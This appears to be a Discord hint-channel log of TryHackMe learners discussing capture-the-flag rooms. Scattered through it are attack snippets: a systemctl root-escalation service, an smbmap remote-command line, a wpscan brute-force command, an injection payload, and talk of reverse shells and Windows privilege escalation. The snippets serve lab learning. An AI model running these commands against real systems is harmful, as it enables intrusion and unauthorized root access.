#room-hints

1 messages · Page 57 of 1

stuck fractal
#

You can always go back

copper token
#

dude the skynet box makes want to go watch T2 lol

iron swan
#

CC: Pen Testing smbmap ipconfig = smbmap -u'admin' -p'password' -h 10.10.10.10 -x 'ipconfig' please help

oblique cliff
#

I don’t see a question

iron swan
#

task 20 in last

copper token
#

The priv esc for skynet is crazy..thankfully for google or else I would never have figured that out... on to the next!

rain heart
#

Hi All, just need some pointers. I'm bogged down in the Cross-Site Scripting Room. Task 4 #1. Craft a reflected XSS payload that will cause a popup saying "Hello". I've tried the script alert statement but I'm told to think again. Please help?

final mortar
#

CC: Pen Testing smbmap ipconfig = smbmap -u'admin' -p'password' -h 10.10.10.10 -x 'ipconfig' please help
@iron swan space, quotes, go figure

dusk imp
#

How good is waiting for hydra to crack things.

final mortar
#

For THM rooms, you should not be wating for too long. ~15minutes is enough I guess

dusk imp
#

well, i've been waiting way too long

#

even just went and had a shower

#

still not done.

keen flume
#

Hi
Is anybody able to help with a problem I'm having executing the PowerUp script for the Steel Mountain room please?
I can upload the script and start powershell, but when I try and execute the script nothing happens
I can't figure out what I'm doing wrong at all, any hints would be much appreciated
I start off with the "PS >" prompt
but when I try "PS >. .\PowerUp.ps1" the I move to a new line without the "PS >" prompt
Really not sure what I'm doing wrong here
Seem to have killed the conversation in here too
just like my PS session

foggy blaze
#

Hi
Is anybody able to help with a problem I'm having executing the PowerUp script for the Steel Mountain room please?
I can upload the script and start powershell, but when I try and execute the script nothing happens
I can't figure out what I'm doing wrong at all, any hints would be much appreciated
I start off with the "PS >" prompt
but when I try "PS >. .\PowerUp.ps1" the I move to a new line without the "PS >" prompt
Really not sure what I'm doing wrong here
Seem to have killed the conversation in here too
just like my PS session
@keen flume im not sure but maybe powershell is restricted to run some files

oblique cliff
#

It’s sometimes difficult to upgrade to powershell on boxes

#

Try running it without droppin into a powershell shell

lone scroll
#

hi..
i try to make challenge learn linux and on task 18, i don`t understand what he want in the second "
What is the value of the home environment variable"

#

what i need to do?

stuck fractal
#

Get the value of the home environment variable

#

Make sure you've swapped users like you're meant to

lone scroll
#

Make sure you've swapped users like you're meant to
@stuck fractal what is mean? switch to user?

stuck fractal
#

You have the password for shiba2 by now, correct?

lone scroll
#

You have the password for shiba2 by now, correct?
@stuck fractal aehh no..becuse i`m return to this challenge after 2 weeks or more

#

then switch to shiba2?

stuck fractal
#

You're meant to, by this task. At least I'm fairly sure.

lone scroll
#

are you remember what is the password to shiba2?

stuck fractal
#

I'm not going to tell you it.

#

If you've completed the task, you entered it into an answer box on TryHackMe

#

Look back at the section for the first binary

lone scroll
#

yeah yeah i looking back

#

then now i need to do echo $home and find the answer?

#

or to look inside in some folder?

analog fiber
#

a little bit of help with the file upload room?

lone scroll
#

i figure the task

analog fiber
#

room name Upload Vulnerabilities

#

im at the last task

alpine lantern
#

hey, need help for Vulnersity : https://tryhackme.com/room/vulnversity, idk if i need to put this || TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF || in a text file or if i can put in in the shell

analog fiber
#

which task is this

#

for vulniversity

alpine lantern
#

oh ye sry, task 5 #2

inner wolf
#

I need help in SESH Birthday CTF I stuck at killswitch flag can't understand how to get flag

alpine lantern
#

I also know i need to modify the command

analog fiber
#

you dont have to put it in a script

#

just copy and paste everything into the shell

alpine lantern
#

ok, but i have another problem, i just don't really know what the command is doing

#

|| i know i can execute a command with the root permissions but idk where i need to put the /root/root.txt in the command ||

analog fiber
#

have you gotten the contents of the /root/root.txt already?

alpine lantern
#

no

analog fiber
#

if you have root permissions you can run cat /root/root.txt to get the contents

#

the content is the flag you are looking foor

alpine lantern
#

i don't have it, i need to get root with || systemctl exploit and read the root.txt flag||

analog fiber
#

yup

#

and you just typed out the whole exploit previously in your first question

#

once you copy and paste the few lines you can run whoami

#

you should be root

alpine lantern
#

ye, but someone told me i need to change something in the command

analog fiber
#

why dont you try it out first

#

without changing anything

#

pretty sure i did not change anything when i tried that exploit

alpine lantern
#

it just give me that

analog fiber
#

try running whoami

alpine lantern
#

i'm still || www-data ||

stuck fractal
#

Those last two lines are wrong

sharp delta
#

Anyone know what this might mean?

#

I think its port knocking, but I don't know what to do after..

#
https://tryhackme.com/room/theblobblog
Enumeration
{REDACTED}
oblique cliff
#

Can you wait 1 more day till we ask for hints on the room please?

#

I’ll release writeups tomorrow then you can ask away

sharp delta
#

Sorry! Though it was a 10 day waiting period

oblique cliff
#

In the meantime you can DM for hints if you want

#

The room was released on Wednesday (I know a bit confusing cuz the created date is wrong rn)

white salmon
#

hi all I'm stuck at "windows forensics" point #11 .....someone could give me a hint? thanks

trail compass
#

hm someone a hint for golden eye task 2 #3 ? it feels like not hte obvious answer, no clue what i am messing up. i even connected to the service and got all the data from it

eternal brook
#

Hey in the blog log room I decoded both the msg tried bruteforcing SSH looked for more open ports still couldn't find something am I missing something?

stuck fractal
#

@eternal brook Can you please wait one more day, as the creator stated above? It's a brand new room

eternal brook
stuck fractal
#

Yep.

eternal brook
#

oh alright

#

i saw the date 38 days old

trail compass
#

yeah that is confusing, i think when kiba was listed as new on dashboard, it also showed a higher number, now it shows 8 days or so

stuck fractal
#

It's being fixed soon

#

Normally rooms have that date reset on release

eternal brook
#

can i pm you? @oblique cliff

oblique cliff
#

Yes but I’m going to doggo park so won’t answer for a bit

marble basin
#

guys in the linux challenge room, i somehow managed to download flag32.mp3 but i can't listen to it

#

what do i do?

stuck fractal
#

Copy it onto a machine where you can listen to it?

marble basin
#

like my own machine?

stuck fractal
#

That works

marble basin
#

how can i do that can you teach me

stuck fractal
#

Copying files from place to place is fairly fundamental

#

I'm certain you can find out how with some research

marble basin
#

okay thanks :)

shut pollen
#

Guys any help with TheBlobBlog ?
Kinda stuck

stuck fractal
#

Still a new box, give it another day please?

shut pollen
#

Not even hints ? I hit a dead end.pepehands

#

puttygen newkey -O private-sshcom -o newkey.puttygen-sshcom

what does*** private-sshcom*** mean here ?

oblique cliff
#

not even hints for 1 more day plz 🙂

#

@shut pollen you can PM for hints if you want

shut pollen
#

Thanks Buddy

valid elbow
#

Can anyone give me a hint on Tartarus? ||I found the user list and password list in the hidden directory, but I was unable to use hydra to log into ssh or ftp with them so now I'm not sure what to try||

white salmon
#

login hydra for ssh mmmm

trim haven
#

@valid elbow have you “gobustered” hard enough?

valid elbow
#

i went to the end of the kali medium size list, I guess I can always gobust some more. Theres someting on port 80 im missing then?

trim haven
#

You won’t find it in a wordlist

#

I don’t know how much of a hint you want but you may need to pay really close attention

#

Because you’ve definitely missed something.

unique crystal
#

Does anyone have the flag for the new OWASP Juice Shop task 7.2? I've gotten the XSS to work a dozen different ways but the flag wont pop.

hard condor
#

I am at OWASP Top 10 Task 21 #2 and I get the XSS to say hello but it apperars to be wrong for the answer

unique crystal
#

What payload are you using?

hard condor
#

I got it.. I used " instead of '' or whatever char it was I copied the example and tried to use an edited version

unique crystal
#

👍

frail rain
#

Room Name: Easy Peasy
Rooted the machine but couldnt find flag3, any ideas?

crystal glade
#

It should be on the web page just keep looking

frail rain
#

i lookedup in writeups but they also didnt mention anything about flag3

#

nvm

#

got it

#

it was infront of my eyes this whole time

crystal glade
#

On first page you open 😄

frail rain
#

and as per the question, it doesn't need to be cracked, its just written there, i think its for confusing peeps,
nah i had to go to other port

crystal glade
#

I forgot there is another port 😄

shut pollen
#

Help with BlobBlog yet ?

wintry yarrow
#

Wait one more day.

dusk imp
#

my only thought is because it's being run on a vm, but even then..

astral smelt
#

It took me less than 5 mins it shouldn't take that long

dusk imp
#

See, that's what I mean. I dunno why it's taking forever.

astral smelt
#

What wordlist did you use?

dusk imp
#

fsocity

astral smelt
#

It could be because you put elliot with a capital

#

Try a lowercase on the e

dusk imp
#

|| wpscan --url http://robot/wp-login -U elliot -P mrrobot/fsocity.dic -t 150 || That's the command I'm using now.

#

We'll see.

#

I'm gonna assume it's gonna be something to do with the fact I'm using a vm tho

white salmon
#

how many cores are you using and how many memory are you using

dusk imp
#

memory is 4GB, core is set to 4.

white salmon
#

okay

dusk imp
#

which is literally half of my actual machine.

white salmon
#

good

dusk imp
#

I'm almost tempted to bump it up to 6 cores, and 6GB of RAM tbh.

#

because my windows is used for discord, and occasionally youtube when I'm waiting for things to happen

white salmon
#

okay good luck

dusk imp
white salmon
#

no idea

dusk imp
#

i'm just gonna play around and see.

rancid crystal
#

@dusk imp which room is it?

dusk imp
#

mrrobot

#

I'm doing what Esqy suggested and using the browser based attack machine to see if it's just my vm being silly

oblique cliff
#

@dusk imp it’s almost certainly because you left duplicates in the dictionary

dusk imp
#

Oh.

#

Thank you blob.

oblique cliff
#

You’re welcome

#

I’m a blob

dusk imp
#

|| I don't know if I should have favourites, but you are one of my favourites. ||

#

Hahaha.

oblique cliff
#

My radiance just increased

dusk imp
#

I didn't want to upset the others. 😛

oblique cliff
#

||we don’t worry about the others 😘||

dusk imp
#

Hahahaha.

#

@oblique cliff blobheart It was absolutely the dups.

#

how didn't I notice the dups previously though, silly me

#

😄

oblique cliff
#

Neither did I when I did the room 🤷🏿‍♂️

#

Not silly

dusk imp
#

how in the world did you do the room with a duplicated dic?

oblique cliff
#

I didn’t I saw it was gonna take 13 hours was like there’s no way that’s right and peeked at a walkthrough haha

dusk imp
#

Ahh I see.

#

yeah, from 858,000 to 11451..

oblique cliff
#

Yep, that scan you showed would’ve been halfway done already haha

dusk imp
#

it just finished.

oblique cliff
#

It worked I hope?

dusk imp
#

Negative @oblique cliff

oblique cliff
#

Show syntax 🤔

foggy blaze
#

guys in advent of cyber DAY 11

#

i found mysql password

#

it says i access denied blobhuh

oblique cliff
#

Is it for root?

foggy blaze
#

yes

oblique cliff
#

As a spoiler what do you think tha password should be

foggy blaze
#

||securepassword123||

oblique cliff
#

Huh that should work

#

Uhhh reboot the box?

#

I haven’t done that room so I’m not really sure unfortunately

foggy blaze
#

ok i will reboot the box

#

thats weird i still can't login xD

oblique cliff
#

I don’t know 😦

#

Uh

#

@trim haven

#

Have you done advent if cyber

crystal glade
#

It's not the root password

#

@foggy blaze

foggy blaze
#

It's not the root password
@crystal glade anyways thanks i fixed it

crystal glade
#

👍

narrow wren
#

Hi. 🙂

Jack – root: I’ve found a family of writable files that match the hint.

My initial thought was looking for SUIDs or cronjobs to that involve p——n. Crontab seems “empty” and suid3num tagged all the SUIDs as common.

Tried pgrep to see if there are other services that may call p——n but am not sure what to look for.

Blog posts discuss finding writable files but assume SUID or timers for execution.

Try again? Try differently? Try smarter? 🙂

edgy aurora
#

Haven't done that room so this may not be relevant but something I always look out for are import statements and the locations (and order) in which the interpreter searches for the modules

narrow wren
#

Haven't done that room so this may not be relevant but something I always look out for are import statements and the locations (and order) in which the interpreter searches for the modules
@edgy aurora

Do you know any ways of listing root-jobs that utilize p——-n? I’ve found scripts owned by root and have plenty of ways to tamper with the modules. Just not finding a timed binary or script that will ultimately call a module.

terse kiln
#

Hello, I need a hint in the c4ptur3-th3-fl4g room. task 2 question 1. I don't know how to get message from the audio wav file. I have opened it in audacity but don't know what to do with it. Also there are not writeups talking about it.

edgy aurora
#

linpeas would probably find anything relevant if you haven't already ran it @narrow wren

#

@terse kiln you're probably looking at the waveform by default in Audacity, try to find a spectrogram view in the program and see what it looks like

spiral yew
#

Learning Linux #43 - The True Ending. I am at the very last part and have found the correct user to open the secret file. But I do not know the password. We were given all the other user's password in the tutorial, but not the one I need. Is there something simple I am missing here?

narrow wren
#

Learning Linux #43 - The True Ending. I am at the very last part and have found the correct user to open the secret file. But I do not know the password. We were given all the other user's password in the tutorial, but not the one I need. Is there something simple I am missing here?
@spiral yew

“Everything you need is on this page.” 🙂 Was there something there you may have overlooked the last time?

spiral yew
#

I just found it. It was not on that page, lol.

narrow wren
#

I just found it. It was not on that page, lol.
@spiral yew Congrats. 🙂 I remember finding the clue on the page, but you had to blink twice and re-read everything.

spiral yew
#

On the actual tutorial page the password is in there?

#

Or the method of getting it

narrow wren
#

There is something there that points you toward how to find it. 🙂 Flew right over my head while I was doing the tasks.

#

It’s a thing some box-devs do to test your attention to detail. I did another box where a password was written inside a paragraph on the first page you see, and I totally missed it.

stuck fractal
#

@narrow wren pspy can catch cron jobs

narrow wren
#

@narrow wren pspy can catch cron jobs
@stuck fractal Thanks, will check it out.

stuck fractal
#

Assuming you've checked the global crontab, right?

narrow wren
#

Yup

bleak arrow
#

For the life of me, I can't seem to see what the correct error is for the burpsuite room

#

Any help getting to the right direction will be very much appreciated

dense violet
#

Any help getting to the right direction will be very much appreciated
@bleak arrow where is the closing curly brace

#

in ur request

stuck fractal
#

Also missing a comma separating the fields?

bleak arrow
#

in ur request
@dense violet
I didn't think before deleting all that.. Guess I just need to start it over

dense violet
#

@dense violet
I didn't think before deleting all that.. Guess I just need to start it over
@bleak arrow nah just put the ',' and the '}'

#

{ "email" :"'", "password":"'"}

bleak arrow
#

{ "email" :"'", "password":"'"}
@dense violet

Thanks

narrow wren
#

@narrow wren pspy can catch cron jobs
@stuck fractal Rooted. Thanks for the hint. 🙂 Pspy is awesome.

stuck fractal
#

Sweet, glad it helped

marble badge
#

yare yare desu

#

that splunk room is really tough lol

obsidian fog
#

anybody working on "jacob the boss" root part ?

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

stuck fractal
#

anybody working on "jacob the boss" root part ?
@obsidian fog as that's a very new room, please wait a couple days before asking for help or hints

obsidian fog
#

NP, thank!

winged mist
#

Burp suite task 13 hint please. Anyone? 🙏

stuck fractal
#

Which question?

#

Both can be solved by reading the report

#

No shortcuts there, you have to actually read it

winged mist
#

Both questions tbh lulzz

#

By reading? Oops then let me read again

#

Ah thanks so much 🙏 I’m finally Burped 🥳🥳🥳

unique crystal
#

Anyone available that can help with the new Juice Shop?

frail void
#

Jacob the boss... got the user flag, but this priv esc is driving me a little up the wall. I feel like I've tried to do it the right way, but messed up something small.

#

Not asking for hints, just stating it's a good box lol

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

stuck fractal
nocturne relic
#

hints on root for jacob the boss

stuck fractal
#

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.
Hey, as that's a brand new room please wait a couple days before asking for help or hints @nocturne relic

nocturne relic
#

k

worn yew
#

Room CC:Pen_Testting > Task 4 > Gobuster

#

When I tried to man gobuster

#

I get nothing > just saying that no manual entry for gobuster

#

How to solve this?

mental blade
#

lol so I'm working through the Linux Challenges room.
I've run into the ultimate in vague instructions.
"Find the difference between two script files to find flag..."
obvs the diff command, but which two script files...? or am I missing something?

#

I'm missing something. nvm.

worn yew
#

How to solve this?
Nevermind solved it

rugged plume
#

What show does Jim reference in his review?

in OWASP Juice Shop

stuck fractal
#

Have you looked at Jim's reviews?

mental ledge
#

Hello everyone, I just i need help. How can i fix this ? im at PS EMPIRE room but i cant run the empire --- FIXED 😄

mental ledge
#

Nevermind guys I fixed it myself 😄

thorn ledge
#

Hello guys, can someone give me a hint about privilege escalation in this new box called Jacob the boss?

wintry yarrow
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

sinful plaza
#

is hint available now for the blob blog room??

oblique cliff
#

Yep!

#

Where are ya stuck?

sinful plaza
#

am still stuck with www-data

#

have been enumerating am getting nothing

oblique cliff
#

You didn’t find any weird or out of place files durin your enumeration

sinful plaza
#

blogFeedback

final mortar
#

Ghidra it is 🙂

sinful plaza
#

kkk thanks for the hint

oblique cliff
#

👍

#

let’s try to stick with 2 or 4 ‘k’s next time 😱

final mortar
#

kkk noted

dire zinc
#

trying to crack a hash with hashcat, can i get a hand

keen willow
#

any hint for Theseus foothold.

oblique cliff
#

pretty sure @limber bane said no hints will be given for that box

keen willow
#

pretty sure @limber bane said no hints will be given for that box
@oblique cliff on my ... ever ?

#

thought, its been a while to resease box so its ok to ask now.

oblique cliff
#

gotta wait for him, cuz im not sure...

#

suit-y boy, whats the dealio?

white salmon
#

I need some help in the privilege escalation part of the room "Retro", I am currently user "nt authority /iusr".

I've tried the following:

  • OS Version exploits
  • Searching for weird services/scheduled tasks/software, the only one mildly suspicious being google chrome, but I couldn't do anything like finding password stores as my current user does not give access to the other users.
  • Check the powershell history
  • Check for unattended files
  • Check for weird files/passwords stored in files...
  • Check unquoted service paths
  • Check for stored credentials with cmdkey /list
  • Check for AlwaysInstallElevated privilege
  • Check passwords in registry
  • Check for the web server logs (no access)
  • Check local services not exposed to the "world", only found smb without any shares, mysql, and some other service I can't identify. (can't reverse tunnel it as I don't have the current user password).
  • Found the SeImpersonatePrivilege enabled but unsucessfully exploit it.
  • Check for weird permissions on folders & files.

Im kinda running out of ideias, my best lead is the SeImpersonatePrivilege, the weird local service on port 5985 and Google Chrome. Which I couldn't sucessfully exploit any of those.

limber bane
#

Yo, no hints for theseus my dudes

#

There will also be no walkthroughs accepted

oblique cliff
#

@white salmon check the pin in #room-help it shows what you shouldve found in the browser history

stuck pendant
#

so in advent of cyber room task 22 day 17(hydra-ha-ha-haa) i tried bruteforce by hydra with rockyou wordlist..but still not able to get inside..as per the hint password would be from first 30 words in the list even tried manual bruteforcing but i am not able to go through please check it ones

nocturne vault
#

any help for upgrading the initial shell in jacktheboss? tried a bunch but no luck

stuck fractal
#

As that's still a new room, please don't ask for help or hints just yet @nocturne vault

nocturne vault
#

gotcha

stuck pendant
#

@stuck fractal please help me

stuck fractal
#

Sorry, I don't help people when they beg like that. We're all volunteers. I help people at my own pace.

stuck pendant
#

sorry for my mistake ,i would be more careful next time @stuck fractal

trim haven
#

you don’t need to ping him he is always watching 😄

white salmon
#

@white salmon check the pin in #room-help it shows what you shouldve found in the browser history
@oblique cliff couldn't find the pin you mean, but im giving up and checking the write-ups im too dumb for this room

#

💀

trim haven
#

Or are you still looking in this chat

oblique cliff
#

its the same CVE

#

sorry, i forgot to mention that, my bad

trim haven
#

No you did Blob

white salmon
#

hummmmm thanks I'll check it out but im not on task 3 stuck

oblique cliff
#

where are you stuck?

#

the privesc i thought?

white salmon
#

privilege escalation from the initial shell

oblique cliff
#

uh how did you get a shell?

#

didnt you ||just RDP in||?

white salmon
#

reverse shell***

#

xd

trim haven
#

Bob

oblique cliff
#

what the heck am i thinking of

trim haven
#

Literally told you what you need for priv esc

white salmon
#

Im kinda confused

oblique cliff
#

what the heck am i thinking of
blobno

#

I am Blob

trim haven
#

What task are you on

white salmon
#

ok I'll check it out xD

oblique cliff
#

not Bob

trim haven
#

What task are you on
@trim haven

#

@white salmon

white salmon
#

oh thought you were asking jabba

#

the user.txt task 2

#

room Retro

trim haven
#

I am Jabba :3

white salmon
#

XD

#

im definetly brain dead

trim haven
#

Which question sorry?

white salmon
#

its not a question

#

I am user nt authority /iusr, the user I suppose is wade

#

I don't have access to the wade user

trim haven
#

Wait what room are you on kekw

white salmon
#

retro

trim haven
#

OHHHH

white salmon
trim haven
#

And you are NT authority

white salmon
#

"nt authority /iusr" yes

#

the user running the wordpress web server

trim haven
#

Oh okay I see

#

@oblique cliff have you done retro

oblique cliff
#

yes

#

what is issue

trim haven
#

Help pls I haven’t

oblique cliff
#

ok allex

#

lets start from the beginning

#

how is your day going?

white salmon
#

kinda ok not that good

#

frustating

#

💀

oblique cliff
#

haha ok, how did you get an initial shell on the system?

white salmon
#

logged in with the wordpress user wade, edited the 404.php

#

with a php windows reverse shell

oblique cliff
#

ok thats actually kinda hilarious cuz thats completely unintended

#

not to worry you can still do the box

stuck fractal
#

How about ||reusing those creds||?

oblique cliff
#

@stuck fractal blobno

#

he can still do the box like he is now

stuck fractal
#

@oblique cliff blobknife

oblique cliff
#

let us continue down this path

white salmon
#

hummmmmmmmmmmmmm

stuck fractal
#

he can still do the box like he is now
@oblique cliff yes but ezpz

oblique cliff
#

james stop, its just as ezpz this way

white salmon
#

been enumerating it for quite some time

oblique cliff
#

allex, enumerate the OS version a bit more

#

you missed something

white salmon
#

windows server 2016 standard 10.0.14393 n/a build 14393

oblique cliff
#

did you run anything like windows exploit suggester, sherlock,etc

white salmon
#

I had to do manual enumeration cause the machine was constantly breaking

#

with powerup and winpeas

oblique cliff
#

did you do windows exploit suggester

#

winpeas and power up dont show kernel exploits i dont think

white salmon
#

i dont know whats that

oblique cliff
#

which is what youre going to want

white salmon
#

Ill check it out

oblique cliff
#

it suggests kernel exploits

#

on windows machines

#

hence the name

white salmon
#

thanks a lot I think I can do something now, I tried searching for the version exploit but didnt find anything,

#

kek

oblique cliff
#

🙂

mental ledge
#

Guys need help Linux challenge flag15 any clues ? or hint except for *release

stuck fractal
#

That's a valid file glob

mental ledge
#

i found 2 look a like flag hash in 4.4.0-75 and 72 but it was not the flag lol

stuck fractal
#

Look up shell globbing

mental ledge
#

Ok thanks ill research about that 😄

copper token
#

Using nmap - what is the fastest way to scan for open TCP ports 1 - 65535? I only want what ports are opened, no details on the services, OS, or anything. I tried doing a syn scan -sS T4 but it takes forever.
(Maascan is quick but I noticed it misses ports sometimes)

trim haven
#

rustscan

#

65k ports in 39 seconds, it scans the ports then pipes it to nmap and uses the flags for service detection etc.

copper token
#

Thanks, looks interesting. Was hoping I could use nmap though

trim haven
#

This does use nmap

#

It checks which ports are open then uses nmap -A -p [Ports]

stuck fractal
#

(I think it stopped using -A?)

trim haven
#

If you want to use nmap and only nmap I'd suggest you doing nmap -T4 <IP> then whatever you get do nmap -A -p<listports>

#

(I think it stopped using -A?)
Not sure but it will still cover the required things so 🤷‍♂️

#

If you want to use nmap and only nmap I'd suggest you doing nmap -T4 <IP> then whatever you get do nmap -A -p<listports>
@trim haven But this is basically what rustscan does, just slower.

copper token
#

Ok great! thank you!

sudden cape
#

doing CC pentesting, on the first part where you have to get user/root on the box, found the open ports, scanned port 80 with gobuster didn't find a foothold even though there's supposed to be a file with creds on it

stuck fractal
#

Scan with extensions, try different wordlists, try recursive if you find dirs

sudden cape
#

found ||/secret/|| directory but using curl/burp suite there's nothing there, in the walk-through there's supposed to be ||creds|| I have also tried terminating and starting a new VM

stuck fractal
#

So, you found a dir. Why not use gobuster on that dir to see if you can find anything in there? Curl just acts like a browser, not much point here

sudden cape
#

I did, found nothing

#

ok NVM

#

found it

white salmon
#

In task 10 of the burpsuite room I should look for a response which issues a cookie but I can’t find it. I have done the room like 5 times over now but stuck. Can someone give a hint?

stuck fractal
#

@white salmon Make sure you're looking at responses

#

And you want a Set-Cookie header

white salmon
#

@stuck fractal thanks!!! I feel so stupid now but finally progress

stuck fractal
#

The analyse can be a bit buggy btw, but that's a burp thing

sacred inlet
#

Hey I was trying to complete the CC: Pen Teating room by paradox

In the 4th task (web enumeration using gobuster)

Should i be using common.txt?

oblique cliff
#

You can use any list found in the directory busting directory default on kali and it should do the trick

sacred inlet
#

Taking too long 😪

#

Found it

oblique cliff
#

🥳

atomic flare
#

Can someone point me in the right direction for the privilege escalation in jacobtheboss?
I haven't found anything out of the ordinary yet, ||dirtycow seems patched|| and I didn't notice anything special in linpeas' output.
I'm currently cracking away at jacobs password hash from the cms to see if I can use that somehow.

oblique cliff
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

oblique cliff
#

New room wait a bit for hints please

atomic flare
#

Huh, go figure, didn't notice that. How long is a box considered new?

oblique cliff
#

Until the room decided explicitly says or a few days like 3/4 days

#

The # days old in the room is wrong rn

#

Will be fixed

#

It was released like 2 days ago iirc

#

Jk released yesterday

pure thistle
#

can anybody give me a gentel nudge with CC: Ghidra room im stuck on the very last question. I don't understand what they are asking for.

oblique cliff
#

If you show the question I can

#

I don’t remember it

pure thistle
#

[Task 6] Final Exam

You should now be able to competently analyze a binary. Now is the chance to show your skills with this crackme! The final exam is the binary called final_exam.
#1

What outputs the good job message?

#

the decompiler shows printf outputs the good job!!! message but thats not the correct answer

oblique cliff
#

They’re asking for what input into the binary will cause the binary to display that message

pure thistle
#

do i need to somehow extract "the binary called final_exam." from the downloaded a.out file to find the correct answer?

oblique cliff
#

No you run the binary with the proper input and it’ll print out that line

#

That make sense?

#

It’s basically just asking what’s the password

long oak
#

Hey, I'm on the Intro to x86-64 room and I've been banging my head for about 3h on the crackme2 [task 7]. I found that the crackme2 executable read the content of ||/home/tryhackme/install-files/secret.txt||, but the content of it (||"vs3curepwd"||) is not the answer. I know I am missing something so could you give me a hint please? @me if you reply to this message

true slate
#

Hey, Im doing CC: Pen Testing to refresh and im on this question.
What is the name of the hidden file with the extension xxa

#

I have tried using the common.txt wordlist and haven't come up with anything

stuck fractal
#

Make sure you're looking on /

true slate
#

thats probably what it is, I was running in the hidden directory

#

thanks

oblique cliff
#

@long oak depends how big of a hint:

small-ish: ||put breakpoints everywhere and see what the binary is doing to your input||
big: ||take the hint given in the room literally||

copper token
#

Greetings! I need a nudge on the box 'Relevant' .. I found some loot but when I try to authenticate with what I found it gets me nowhere.. if you want to give me a nudge or small clue DM me please

#

I see a write up but don't want to go through it yet

patent token
#

We can chat here.

copper token
#

my last guess was to use wireshark for maybe a clue on the wire

patent token
#

Keep in mind that I built the challenge to force you to know when to quit and try another approach.

copper token
#

ok ill keep thinking

patent token
#

So having found what you have, and seeing as you continue to get nowhere with it ||as intended||, make sure to go back to your scan and check those results.

#

If you did a basic scan, consider a full port scan.

copper token
#

nmap -p- 10.10.166.31 T4 -Pn
nmap -A -T4 -p 80,135,139,3389,49663,49666,49668 10.10.166.31 -Pn

#

Those are the scans I ran

patent token
#

That's all you need. 🙂

copper token
#

ok ill read back over my results

patent token
#

Enumerate everything, not just what appears to be obvious.

#

If you need any more help please feel free to ask. I'll be around for a bit longer tonight.

copper token
#

ok cool

pine hazel
stuck fractal
#

it does crack if you give it time

pine hazel
stuck fractal
#

But you're not specifying the wordlist correctly

patent token
#

If you identify the hash and declare it with the --format flag, it will probably be faster as well.

stuck fractal
#

--wordlist= or -w=. No spaces allowed.

pine hazel
#

Ah, that fixed it

#

Is it safe to assume anything -x will be safe to use with =?

stuck fractal
#

It's specifically john being fussy

#

Most programs don't use that

silent trellis
#

evening everyone, any hints on a wordlist to use for the brute force wps attack? Trying to run rockyou against 3 users is taking forever...

stuck fractal
#

evening everyone, any hints on a wordlist to use for the brute force wps attack? Trying to run rockyou against 3 users is taking forever...
@silent trellis Room, task, question?

silent trellis
#

sorry my bad... this is for the Jack room

stuck fractal
#

If that's taking ages, why not try a shorter wordlist first?

silent trellis
#

@stuck fractal started trying to run the xato ones as well, but up to the 10k list already and not having luck.

stuck fractal
#

Fasttrack is nice and short

silent trellis
#

thank you I'll give that one a shot

patent token
#

ummm

#

ghost ping?

copper token
#

I noticed relevant sometimes closes its ports on me after a while.

#

Maybe thats from me scanning against it too much?

patent token
#

You may be knocking a service down if you are trying to scan it too quickly.

copper token
#

ok

#

one thing i noticed is that I can make a connection to the httpapi port 49663 using ftp, netcat, etc.. but doesn't do much

patent token
#

What else have you tried with that port?

copper token
#

tried to hit it via web browser

patent token
#

Have you checked for subdirectories?

copper token
#

yeah..

patent token
#

Did you find anything?

copper token
#

oh wait,

#

i have to specify that port in the gobuster scan

patent token
#

yep

#

Make sure you're using a robust enough wordlist too.

copper token
#

interesting.. ok.. yeah that makes sense.

#

thanks i will roll with this and see how far i can get!

#

An IIS webserver can have multiple sites as long as they are listening on different ports, therefore directories may exist behind each port. Gotta remember that for next time

patent token
#

🙂

copper token
#

My brain didn't click that once I tried to hit it via web browser on 49663 and saw the default IIS lol

#

I just stopped

white salmon
#

Fowsniff CTF - has anybody used the python3 reverse shell into ||cube.sh||?

sick sun
#

is this allowed to ask hint about room ||Jacob The Boos|| ?

wintry yarrow
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

dire zinc
#

stuck on last question for basic pentesting, any hints?

trim haven
#

Have you checked the Hint?

dire zinc
#

found /usr/bin/vim.basic had root perms so just gave jan root and cat pass.bak

trim haven
#

Correct?

sacred inlet
trim haven
#

LHOST is wrong.

#

You put both the LHOST and the RHOST as the same value/

dire zinc
#

Yes

sacred inlet
#
